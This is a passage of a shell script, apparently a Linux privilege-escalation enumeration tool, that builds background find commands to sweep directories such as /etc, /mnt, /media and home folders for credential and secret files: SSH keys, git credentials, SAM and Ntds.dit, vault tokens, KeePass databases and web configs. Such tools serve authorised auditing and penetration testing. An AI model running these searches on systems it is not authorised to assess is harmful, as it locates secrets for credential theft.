\"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"*knockd*\" -o -name \".gitconfig\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name 